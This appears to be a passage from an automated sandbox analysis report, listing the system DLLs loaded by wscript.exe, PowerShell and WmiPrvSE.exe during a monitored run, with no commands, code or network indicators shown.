                    Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: comsvcs.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdatauser.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
